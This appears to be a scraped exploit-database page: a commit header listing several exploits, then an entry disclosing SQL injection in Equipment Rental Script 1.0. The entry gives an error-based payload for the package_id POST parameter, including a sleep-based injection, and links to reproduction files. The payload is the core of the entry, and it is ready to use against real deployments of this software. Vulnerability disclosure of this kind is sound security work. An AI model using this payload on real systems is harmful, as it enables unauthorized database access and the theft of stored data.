a5920da7af
10 changes to exploits/shellcodes/ghdb Ricoh Printer - Directory and File Exposure Blood Bank & Donor Management System using v2.2 - Stored XSS Equipment Rental Script-1.0 - SQLi Bank Locker Management System - SQL Injection Fundraising Script 1.0 - SQLi PHP Shopping Cart 4.2 - Multiple-SQLi 7 Sticky Notes v1.9 - OS Command Injection Typora v1.7.4 - OS Command Injection
32 lines
No EOL
1.3 KiB
Text
32 lines
No EOL
1.3 KiB
Text
## Title: Equipment Rental Script-1.0 - SQLi
|
|
## Author: nu11secur1ty
|
|
## Date: 09/12/2023
|
|
## Vendor: https://www.phpjabbers.com/
|
|
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
|
|
## Reference: https://portswigger.net/web-security/sql-injection
|
|
|
|
## Description:
|
|
The package_id parameter appears to be vulnerable to SQL injection
|
|
attacks. The payload ' was submitted in the package_id parameter, and
|
|
a database error message was returned. You should review the contents
|
|
of the error message, and the application's handling of other input,
|
|
to confirm whether a vulnerability is present. The attacker can steal
|
|
all information from the database!
|
|
|
|
[+]Payload:
|
|
mysql
|
|
|
|
Parameter: #1* ((custom) POST)
|
|
Type: error-based
|
|
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
|
|
Payload: package_id=(-4488))) OR 1 GROUP BY
|
|
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
|
|
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
|
|
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
|
|
|
|
## Reproduce:
|
|
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
home page: https://www.nu11secur1ty.com/ |